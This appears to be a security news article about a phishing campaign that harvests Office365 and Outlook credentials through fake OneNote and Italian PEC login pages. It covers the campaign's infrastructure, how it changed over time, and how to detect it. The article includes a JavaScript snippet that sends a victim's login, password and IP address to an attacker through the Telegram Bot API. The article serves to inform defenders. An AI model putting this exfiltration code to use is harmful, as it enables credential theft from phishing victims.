Hackers Use Fake OneNote Login to Capture Office365 and Outlook Credentials

A recent investigation by security analysts has uncovered a persistent phishing campaign targeting Italian and U.S. users, utilizing a chain of free cloud platforms and Telegram bots for credential harvesting and data exfiltration.

The attack typically begins with a phishing page hosted on services like Notion or Google Docs, masquerading as legitimate portals such as Microsoft OneNote or Italy’s PEC (Posta Elettronica Certificata) email system.

Victims are lured via email into clicking a link that leads to a fake login page, where they are prompted to enter their credentials.

Upon submission, the phishing script collects not only the entered credentials but also the victim’s IP address, often using the ipify.org service.

The stolen data is then exfiltrated through the Telegram Bot API, with bot tokens and chat IDs hardcoded into the malicious JavaScript.

After the data is sent, users are redirected to the genuine Microsoft login page, maintaining the illusion of legitimacy.

Technical Exfiltration Code Example:

javascript// Capture victim's IP address
fetch('https://api.ipify.org?format=json')
  .then(response => response.json())
  .then(data => {
    let ip = data.ip;
    let message = `Login: ${login}nPassword: ${password}nIP: ${ip}`;
    // Exfiltrate via Telegram bot
    fetch(`https://api.telegram.org/bot/sendMessage?chat_id=&text=${encodeURIComponent(message)}`);
  });

Replace and with attacker-controlled values.

Evolution and Patterns in Phishing Techniques

Analysis of multiple samples reveals that while the phishing themes and visual layouts have varied—sometimes mimicking OneNote, other times PEC—the underlying exfiltration mechanism has remained consistent.

Early variants used simple form submissions for data theft, but by February 2022, attackers had standardized on Telegram bot-based exfiltration, occasionally adding obfuscation through nested URL encoding or Base64, though these techniques were later abandoned.

The campaign’s infrastructure is characterized by:

• Use of free or low-cost cloud services (Notion, Glitch, Google Docs, RenderForest) for hosting phishing content.
• Minimal evasion techniques, with only basic obfuscation and no advanced anti-detection measures.
• Reliance on Telegram bots as off-the-shelf command-and-control (C2) infrastructure.

Table: Evolution of Phishing Mechanisms

Profiling the Threat Actor and Detection Strategies

The threat actor behind this campaign appears to lack advanced technical skills, favoring simplicity and scalability over sophistication.

The campaign is low-volume but persistent, with evidence suggesting a focus on access brokering—selling harvested credentials to other cybercriminals—rather than direct exploitation.

Key Technical Indicators:

• Hardcoded Telegram bot tokens and chat IDs in phishing scripts.
• Behavioral pattern: Notion → Glitch → Telegram API.
• Use of the Italian language and targeting of Italian business domains.

Sample Telegram Bot Tokens and Chat IDs:

Detection Recommendations:

• Monitor for network traffic to Telegram Bot API domains, especially in conjunction with access to Notion or Glitch-hosted pages.
• Implement signature-based detection for hardcoded Telegram bot tokens in web traffic.
• Track domain chains and page titles indicative of phishing (e.g., “One Note | Microsoft”, “Aruba | PEC”).

This campaign highlights the ongoing evolution of phishing operations, where attackers leverage easily accessible cloud infrastructure and messaging APIs for credential theft, underscoring the need for vigilant monitoring and adaptive defense strategies.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!